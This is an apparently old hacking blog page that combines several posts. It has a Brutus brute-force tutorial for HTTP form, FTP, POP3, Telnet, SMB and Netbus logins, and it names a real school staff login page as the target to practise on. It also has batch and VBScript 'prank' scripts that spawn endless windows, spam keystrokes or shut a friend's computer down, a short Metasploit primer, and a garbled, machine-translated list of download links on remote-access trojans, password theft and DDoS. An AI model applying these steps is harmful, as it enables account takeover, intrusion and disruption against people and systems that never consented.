HACKING TUTORIAL

Brutus Tutorial on How to use it

Chapter 1: Introduction to Brutus.

1.What is Brutus?

2.What can I do with it?

3 Where can I download Brutus?

4.Where can I find a good password list?

Chapter Two: Let’s Get Crackin’.

1.HTTP Form.

2.FTP.

3.POP3

4.Telnet.

5.SMB (Netbios)

6.Netbus

7.Custom.

Chapter Three: Wrapping up.

1.Contact Information.
========================================
Chapter One.

==What is Brutus?==

Brutus is a well known password brute forcing program.

==What can I do with it?==

With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a
“Custom” option so you can specify your own settings.

==Where can I download Brutus?==
You can find Brutus at it’s webpage www.hoobie.net/brutus
You can also find it at GluTuk’s site www.spartandownloads.2ys.com

==Where can I find a good password list to use with Brutus?==
Pretty much, the only password list you will ever need
and has 4.9 million passwords. Here are a link where you can download it.

Part 1.
http://area51archives.com/files/pass_list.rar

Part 2
http://area51archives.com/files/pass_list.rar

================================================== ============

Chapter Two: Let’s Get Crackin’.

Note: You can use a proxy for each cracking method.

==HTTP Form==

This is the option you would use if you want to crack into a website that has a field for a username and a pass, like
this one.

http://www.westbranch.k12.oh.us/staff/controls.asp

I will use this site for the rest ov this section as well.

First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put
the above link into the Target form field, then click Learn Form Settings
From here, you click the field name that is for the username, in this case it is userid, once you have selected it,
click the username button that is shown above the cookie information. That tells brutus that that field is for the username.
Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you
need to fill that in with the response you get when you try to enter a password into your site. In this case the response is
“You have entered a wrong Password or username.” For this target we will put that into the Primary response field Once this
is done, we click ok, add the IP into the Target Field and start our crack.

==FTP==

For cracking an FTP server, the default settings should remain how they are, I usually make sure that the “Try to stay
connected for unlimited attempts” box is ticked.Thats up to you, once you have selected your options, enter the IP and
being the crack.

==POP3==

This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to
use the “Try to stay connected for unlimited attempts” option.

==Telnet==

Seems as if I’m repeating myself, but once again, the default settings should werk for you.

==SMB (Netbios)==

If you happen to find yourself a target that has the netbios port open (139) and has sharing enabled, but needs a
password, this is what you would use. Once again, default settings should werk.

==Netbus==

Netbus is a popular trojan that sometimes, you might find a server that needs a password to connect.
This option is used for, cracking a password protected Netbus server.

==Custom==

This is what you would use to set up a crack for anything else that you could think ov.You need to find out what you need
to put in each field once you click “Define sequence” Those options will vary from target to target.

___________________________________________________

HOW TO FIX FOLDER OPTION MISSING PROGRAM:

Hello Friends Today I am going to tell how get back the Folder Options .Most of times it happens that viruses infects your system and folder options becomes missing. First of all friends I share one thing with you all that 90 percent of doesn’t delete things on your Computer they just modify their properties like either they hide them or corrupt them. And your information there are several ways to recover from that. Today I am sharing with you “How o fix Folder Options Missing Problem”.

STEPS INVOLVED:
1. Go to the Start Menu and open the run.

2. In the Run Type “gpedit.msc” (Without quotes) and press enter.

3.Now you will see Something like this..


4.Now Go to User Configuration>>>Administrative Templates>>>Windows Component>>>Windows Explorer.

5.Click on Windows Explorer you will find the 3rd option on the right side of screen “Removes the Folder Option menu item from the Tools menu”.

6.Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

7.I hopes that you will find the option after restarting windows.


That’s the Overall Process of fixing the Folder Options Missing Problem.!
____________________________________________________

VERY GOOD NOTEPAD HACKS:

Hey Friends today I am going to share few New Notepad hacks. They are really cool and crazy one’s. So Please think atleast three to four times to use them on your PC.


UNLIMITED NOTEPAD WINDOWS HACK
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as “.vbs” extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Hack your friend’s keyboard and make him type “You are a fool” simultaneously:

Code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop


Convey your friend a message and shut down his / her computer:
Code:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s

Save it as “Anything.BAT” in All Files .

_____________________________________________________

Metasploit Explained A Tutorial For Beginners:

Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them and on the other hand it can  alsobe used to break into remote systems.

Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience
Download here(windows user) http://www.metasploit.com/releases/framework-3.2.exe
Download here(linux user) http://www.metasploit.com/releases/framework-3.2.tar.gz

Just give a look at following basic steps for beginners to break into a system using metasploit after gathering some information about the target system.
1. Select a right exploit and then set the target. 2.Verify the exploit options to determine whether the target system is vulnerable to the exploit. 3.Select a payload 4.Execute the exploit.
You must be confused !!!!

Now carefully read the following basic terms to get an idea about these four steps mentioned above .I have defined the terms technically and side by side explained in layman language to clarify the things. I have taken an example that an attacker wants to break into a house . I hope my this approach will give you a great idea about these basic terms .


Vulnerability -A weakness which allows an attacker to break into or compromise a system’s security.


Like the main gate of house with a weak lock (can be easily opened) , a glass window of house(can be easily broken) etc can be the vulnerabilities in the systems which make it easy for an attacker to break into.

Exploit – Code which allows an attacker to take advantage of a vulnerability system.


The set of different keys which he can try one by one to open the lock , the hammer with him which he can use to break the glass window etc can be the exploits.

Payload- Actual code which runs on the system after exploitation


Now Finally after exploiting the vulnerability and breaking in , he can have different things to do. He can steal money, destroy the things or just can give a look and come back.. Deciding this is what we mean by setting the Payload.

I hope its enough friends, You will learn more with further tutorials when you will start working with metasploit practically.

_____________________________________________________

Hacking Video Explainations (First Time On Any Blog)

Program Albfrost original version


http://www.mediafire.com/?mm4dqdngomz


Program Albaizon original version


http://www.mediafire.com/?wmmmmmyynq4

FTP via CGI explain the lifting of the page


http://www.mediafire.com/?jhtzjrzmakj


Explanation to identify the characteristics of borates


http://www.mediafire.com/?tlzyyzwgzyn


Explanation of Patch-making Borat


http://www.mediafire.com/?i4zyeqenezm


Explanation register for tripod.lycos.com


http://www.mediafire.com/?dw4wzz2ynyz
Birth of the stolen Alpsordat
Code PHP:




http://www.mediafire.com/?zwzmzwmwokt


Program to penetrate new markets down


Code PHP:




http://www.mediafire.com/?lnzzuwmnn1n


Server configuration for Fberost


Code PHP:


http://www.mediafire.com/?mm2yu2kktvz


Server configuration for Baizon


Code PHP:


http://www.mediafire.com/?mm5glmroewt


Shell to configure the server


Code PHP:


http://www.mediafire.com/?ntt0hxty5mi
Come the victim’s fear




Code PHP:




http://www.mediafire.com/?zwtmumnujoi


Contact explain the inverse Borat




Code PHP:


http://www.mediafire.com/?ydmyemwymzk


Explanation penetration along the Bay 1




Code PHP:


http://www.mediafire.com/?yg20uyytzzj

Explanation penetration along the Bay 2


http://www.mediafire.com/?jynyjttlwmn


Explanation of reporting across Alaiml Borat


http://www.mediafire.com/?zyumiwjlyho


Explanation register for ripway


http://www.mediafire.com/?ijmmitt1kjz


Explanation register for no-ip


http://www.mediafire.com/?5vyytqizzyo


Explanation withdraw Alpsordat by flash


http://www.mediafire.com/?zmzmnztnu0m

Description Albfrost a full explanation of


http://www.mediafire.com/?o5jhndz5lno


Description of the ddos attack on the IP Address


http://www.mediafire.com/?1lzqmtjmnin


Explanation fixing Albfrost and change the image of reporting


http://www.mediafire.com/?ju5jdxymzyz


Explain the properties of Albaizon


http://www.mediafire.com/?jonz2r2qon2


Explain the properties of Immobilizing


http://www.mediafire.com/?jywntnzmgyr


Chorhat to enter the world of Alhecr


http://www.mediafire.com/?rwokwynhnym


Explained the GNU steal any P-1




Code PHP:
http://www.mediafire.com/?h41jrfyflyy


Explanation making Bernameh Balvjul check if the port is open or not


Code PHP:


http://www.mediafire.com/?ozztjnwgmm4


Explanation-making program to change icons


http://www.mediafire.com/?inwdk0zwhcj


Explanation making Conception and steal the GNU ABC and see if the GNU ABC stolen or not


Code PHP:




http://www.mediafire.com/?hdwmemd2mye


Way to turn off Deeb Fries


http://www.mediafire.com/?zjw3hdmdwtj


Explanation decompress ÇáÈ& Ccedil;ÊÔ before the encryption process


http://www.mediafire.com/?jmnn3yz2zkz


Explanation for the registration site and the work dyndns.com Forums


http://www.mediafire.com/?wmy0jzmevze


Way to turn off Deeb Fries


http://www.mediafire.com/?imdnxxzznyz


Freeze Alaimlat


http://www.mediafire.com/?ybmyzwmyzzz


Explanation withdraw Alpsordat through the program Immobilisation


http://www.4shared.com/file/97781509/61ccc183/___.html
————————————————– –
Clear brother Knight 1

http://www.mediafire.com/?jyzvmmzj2ut


Clear brother Knight 2


http://www.mediafire.com/?zjzzixo3mqt


Clear brother Knight 3


http://www.mediafire.com/?z5zzkzmwhzz



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s